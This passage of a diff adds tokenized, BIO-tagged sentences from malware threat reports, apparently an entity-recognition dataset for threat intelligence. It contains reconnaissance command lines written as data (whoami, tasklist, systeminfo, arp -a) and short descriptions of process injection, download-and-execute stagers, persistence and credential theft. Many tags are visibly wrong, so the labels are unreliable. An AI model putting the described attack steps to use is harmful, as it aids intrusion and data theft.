"cmd", + "/C", + "\"C:", + "&", + "cd", + "\\", + "&", + "whoami\"" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "/C", + "\"C:", + "&", + "cd", + "\\", + "&", + "tasklist\"" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "/C", + "\"C:", + "&", + "cd", + "\\", + "&", + "systeminfo\"" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Copying", + "of", + "files", + "across", + "SMB", + "shares" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "cmd", + "/C", + "\"C:", + "&", + "cd", + "\\", + "&", + "arp", + "-a\"" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Removal", + "of", + "artefacts", + "from", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "wmic", + "/node" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "wmic", + "/node" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "wmic", + "/node" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "wmic", + "/node" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "wmic", + "/node" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "wmic", + "/node" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "were", + "used", + "to", + "inject", + "the", + "payload", + "into", + "process", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adds", + "Run", + "Registry", + "Key", + "for", + "Persistence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "persistence", + "technique", + "is", + "simply", + "adding", + "a", + "run", + "registry", + "key", + "for", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "added", + "to", + "the", + "startup", + "folder" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Screen", + "capture" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Screen", + "Logger" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Keylogging" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Keylogger" + ], + "ner_tags": [ + "B-Way" + ] + }, + { + "tokens": [ + "Gathering", + "system", + "information" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "System", + "Information" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Encoded", + "shellcode", + "in", + "Project", + "File" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contained", + "encoded", + "executables", + "and", + "shellcode," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoadLibraryW,", + "VirtualAlloc,", + "CreateProccessW,", + "and", + "ZwUnmapViewOfSection." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "LoadLibraryW", + "loads", + "the", + "module,", + "VirtualAlloc", + "allocates", + "the", + "memory,", + "CreateProcessW", + "created", + "a", + "process,", + "and", + "ZwUnmapViewOfSection", + "is", + "used" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "callback", + "function", + "pointer", + "in", + "CallWindowProc" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "payload", + "from", + "the", + "project", + "files", + "was", + "a", + "remote", + "access", + "tool", + "(RAT)", + "called", + "Remcos." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "two", + "large", + "arrays", + "of", + "decimal", + "bytes", + "were", + "decoded", + "by", + "the", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decoding", + "Function" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decoding", + "function" + ], + "ner_tags": [ + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Remote", + "Command", + "Line" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Registry", + "Editor" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "stealing", + "multiple", + "types", + "of", + "data" + ], + "ner_tags": [ + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp" + ] + }, + { + "tokens": [ + "the", + "“UsingTask”", + "element", + "defines", + "the", + "task", + "that", + "will", + "be", + "compiled", + "by", + "MSBuild." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MSBuild", + "has", + "an", + "inline", + "task", + "feature" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Modify", + "and", + "query", + "the", + "Windows", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "query", + "the", + "Windows", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Log", + "keystrokes" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Bypass", + "UAC" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Egress", + "communications", + "over", + "HTTP,", + "HTTPS" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "Take", + "screenshots" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Set", + "up", + "proxies" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "payloads", + "are", + "usually", + "shellcode", + "encrypted", + "with", + "a", + "rolling", + "XOR", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "encoded", + "payload", + "has", + "been", + "located" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "project", + "file", + "has", + "an", + "encoded", + "and", + "compressed", + "payload" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "use", + "of", + "shellcode,", + "encoding,", + "compression,", + "obfuscated", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "since", + "each", + "payload", + "will", + "be", + "encrypted", + "with", + "different", + "keys", + "and", + "each", + "configuration", + "will", + "uniquely", + "change", + "the", + "hash", + "value." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Encrypted", + "payloads", + "will", + "also", + "obfuscate", + "useful", + "strings", + "from", + "static", + "analysis." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "multiple", + "stages", + "and", + "encrypted/obfuscated", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "code", + "can", + "be", + "injected", + "into", + "other", + "legitimate", + "running", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "payload,", + "usually", + "shellcode,", + "is", + "injected", + "into", + "another", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "shellcode", + "is", + "then", + "executed", + "in", + "a", + "new", + "thread." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "endpoint", + "with", + "a", + "system", + "injected" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "process", + "injection" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "process", + "injection" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inject", + "malicious", + "code", + "into", + "legitimate", + "processes" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "a", + "memory-only", + "DLL", + "that", + "runs", + "as", + "a", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "pulls", + "the", + "Cobalt", + "Strike", + "payload", + "from", + "a", + "fake", + "JPG", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "also", + "leveraging", + "steganography", + "to", + "locate", + "the", + "start", + "of", + "the", + "encoded", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "uses", + "a", + "different", + "custom", + "packer" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "I-Tool", + "I-Tool" + ] + }, + { + "tokens": [ + "the", + "malware", + "to", + "unpack" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + ",", + "it", + "extracts,", + "decrypts,", + "and", + "decompresses", + "the", + "data", + "to", + "be", + "executed", + "as", + "shellcode." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "payload", + "is", + "decrypted,", + "decompressed,", + "and", + "then", + "copied", + "into", + "memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "is", + "decrypted", + "and", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decode" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "domain", + "fronting" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "or", + "download", + "additional", + "stages." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "drops", + "and", + "executes", + "Cobalt", + "Strike", + "in", + "the", + "memory", + "space", + "of", + "“rundll32.exe.”" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "This", + "requires", + "either", + "social", + "engineering", + "tactics", + "to", + "get", + "the", + "target", + "to", + "execute", + "the", + "malware", + "or", + "another", + "program/script", + "to", + "execute", + "the", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "optimize", + "brute", + "forcing", + "efforts,", + "the", + "malware", + "compares", + "the", + "server", + "prompt", + "upon", + "connection", + "to", + "a", + "hardcoded", + "list", + "of", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "credentials", + "used", + "appear", + "to", + "be", + "default", + "credentials", + "for", + "IoT", + "devices." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "It", + "attempts", + "to", + "specifically", + "gain", + "root", + "access", + "to", + "these", + "devices", + "via", + "a", + "default", + "password" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Like", + "the", + "earlier", + "SSH", + "brute-forcing", + "campaign" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Org", + "B-Way", + "B-OffAct" + ] + }, + { + "tokens": [ + "brute-forced", + "devices" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "optimizing", + "the", + "brute", + "forcing", + "implementation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Code", + "for", + "the", + "brute", + "forcing", + "implementation", + "is", + "significantly", + "more", + "structured" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "added", + "to", + "support", + "the", + "Telnet", + "brute", + "force." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Restart", + "Telnet", + "brute", + "forcing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "brute", + "forcing" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "SSH", + "brute", + "forcing", + "code", + "with", + "the", + "more", + "usual", + "Telnet", + "equivalent." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Telnet", + "brute", + "forcing", + "code", + "is", + "designed", + "primarily", + "for", + "self-propagation" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SSH", + "brute-forcing", + "campaign," + ], + "ner_tags": [ + "B-Org", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "This", + "allows", + "it", + "to", + "download", + "and", + "deploy" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "are", + "downloaded", + "and", + "executed", + "in", + "the", + "victim's", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloader", + "to", + "the", + "compromised", + "device", + "that", + "executes", + "and", + "downloads", + "the", + "primary", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "downloads", + "its", + "payload", + "via", + "software", + "installed", + "on", + "the", + "compromised", + "device,", + "such", + "as", + "ftpget,", + "wget,", + "curl,", + "or", + "tftp,", + "before", + "executing", + "the", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "uses", + "the", + "cpuinfo", + "Python", + "module", + "to", + "retrieve", + "information", + "about", + "the", + "CPU." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "code", + "checks", + "if", + "the", + "disk", + "size", + "is", + "greater", + "than", + "a", + "specified", + "threshold", + "(50", + "GB", + "as", + "example)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "the", + "win32api.GetDiskFreeSpaceEx()", + "function", + "to", + "retrieve", + "the", + "disk", + "size", + "in", + "bytes" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reflective", + "PE", + "injection" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reflective", + "PE", + "injection", + "is", + "a", + "technique", + "used", + "by", + "malware", + "or", + "advanced", + "attackers", + "to", + "inject", + "a", + "Portable", + "Executable", + "(PE)", + "file", + "directly", + "into", + "the", + "memory", + "of", + "a", + "running", + "process", + "without", + "the", + "need", + "for", + "writing", + "the", + "file", + "to", + "disk" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reflective", + "PE", + "injection", + "allows", + "the", + "malware", + "to", + "load", + "and", + "execute", + "its", + "code", + "directly", + "from", + "memory" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "reflective", + "PE", + "injection,", + "the", + "PE", + "file", + "is", + "parsed", + "and", + "its", + "sections", + "are", + "reconstructed", + "in", + "the", + "target", + "process’s", + "memory." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "-ReflectivePEInjection”", + "that", + "facilitates", + "reflective", + "PE", + "injection", + "using", + "PowerShell." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "This", + "module", + "allows", + "the", + "injection", + "of", + "a", + "PE", + "file", + "into", + "a", + "remote", + "or", + "local", + "process’s", + "memory", + "without", + "writing", + "it", + "to", + "disk" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "PE", + "file", + "is", + "injected", + "and", + "reconstructed", + "in", + "memory,", + "the", + "execution", + "flow", + "can", + "be", + "redirected", + "to", + "the", + "injected", + "code,", + "enabling", + "the", + "malware", + "to", + "operate", + "within", + "the", + "context", + "of", + "the", + "compromised", + "process." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PE", + "reflective", + "injection." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "PE", + "file", + "is", + "downloaded", + "on", + "filesystem", + "and", + "than", + "executed." + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "the", + "DownloadFile", + "method", + "of", + "the", + "WebClient", + "object", + "to", + "download", + "the", + "file", + "from", + "the", + "specified", + "URL", + "and", + "save", + "it", + "to", + "the", + "specified", + "local", + "file", + "path." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "file", + "to", + "be", + "downloaded." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "script", + "that", + "downloads", + "a", + "file", + "from", + "a", + "fixed", + "location", + "and", + "executes", + "it." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "one-liner", + "that", + "can", + "be", + "used", + "to", + "download", + "and", + "execute", + "a", + "remote", + ".ps1", + "or", + ".exe", + "file:" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "using", + "LNK", + "files", + "to", + "download", + "malware", + "or", + "other", + "malicious", + "files", + "by", + "leveraging", + "legitimate", + "native", + "apps,", + "such", + "as", + "PowerShell." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "simple", + "stager", + "download", + "of", + "an", + ".exe", + "file", + "and", + "its", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "line", + "uses", + "the", + "ShellExecute", + "method", + "of", + "the", + "Shell.Application", + "object", + "to", + "execute", + "the", + "downloaded", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Shell.Application", + "object", + "provides", + "methods", + "for", + "working", + "with", + "the", + "Windows", + "shell" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "This", + "decryption", + "process", + "utilizes", + "the", + "Fernet", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "script", + "will", + "download", + "and", + "decrypt", + "the", + "string", + "that", + "represents", + "the", + "token" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "fernet_decrypt", + "function", + "decrypts", + "an", + "encrypted", + "string" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "returns", + "the", + "decrypted", + "message", + "as", + "a", + "decoded", + "string." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "use", + "the", + "harcoded", + "password", + "for", + "decryption", + "using", + "the", + "fernet_decrypt", + "function,", + "and", + "returns", + "the", + "decrypted", + "AUTH", + "Token." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "the", + "file", + "will", + "be", + "deleted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "access", + "to", + "system", + "APIs," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "uses", + "the", + "win32api.GetDiskFreeSpaceEx()", + "function" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Fernet", + "is", + "a", + "symmetric", + "encryption", + "algorithm", + "and", + "token", + "format", + "used", + "for", + "secure", + "communication", + "and", + "data", + "protection" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "It", + "utilizes", + "symmetric", + "key", + "cryptography,", + "where", + "the", + "same", + "secret", + "key", + "is", + "used", + "for", + "both", + "encryption", + "and", + "decryption" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "this", + "code", + "comparing", + "the", + "local", + "IP", + "address", + "with", + "a", + "predefined", + "list", + "of", + "network", + "addresses" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscation", + "mechanisms", + "during", + "the", + "compilation", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "injected", + "code" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "local", + "disk", + "volumes", + "to", + "be", + "encrypted", + "are", + "also", + "configured", + "in", + "a", + "similar", + "manner." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "addition", + "to", + "file", + "encryption", + "and", + "obfuscation," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "(crawl", + "whole", + "tree),", + "I:,", + "H:,", + "G:,", + "F:,", + "E:,", + "and", + "D:." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "will", + "attempt", + "to", + "gather", + "specific,", + "sensitive", + "information", + "from", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-Purp", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "dropper", + "is", + "distributed", + "in", + "the", + "form", + "of", + "a", + "UPX-packed", + "DLL" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "then", + "abuses", + "the", + "MSDTC", + "service,", + "manipulating", + "the", + "permissions", + "and", + "startup", + "parameters." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "its", + "abuse", + "of", + "the", + "legitimate", + "MSDTC", + "service," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malicious", + "oci.dll", + "into", + "the", + "service’s", + "executable" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "its", + "attempts", + "to", + "steal", + "credentials", + "and", + "browser", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "includes", + "browser", + "session", + "and", + "credential", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Credential", + "and", + "Browser", + "Data", + "Theft" + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "checks", + "that", + "there", + "are", + "no", + "running", + "processes", + "related", + "to", + "security-related", + "software", + "(e.g.,", + "Windbg,", + "Autoruns,", + "Wireshark)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "It", + "checks", + "that", + "there", + "are", + "no", + "drivers", + "loaded", + "from", + "security-related", + "software", + "(e.g.,", + "groundling32.sys)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "checks", + "that", + "the", + "status", + "of", + "certain", + "services", + "belonging", + "to", + "security-related", + "software", + "meets", + "certain", + "conditions", + "(e.g.,", + "windefend,", + "sense,", + "cavp)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 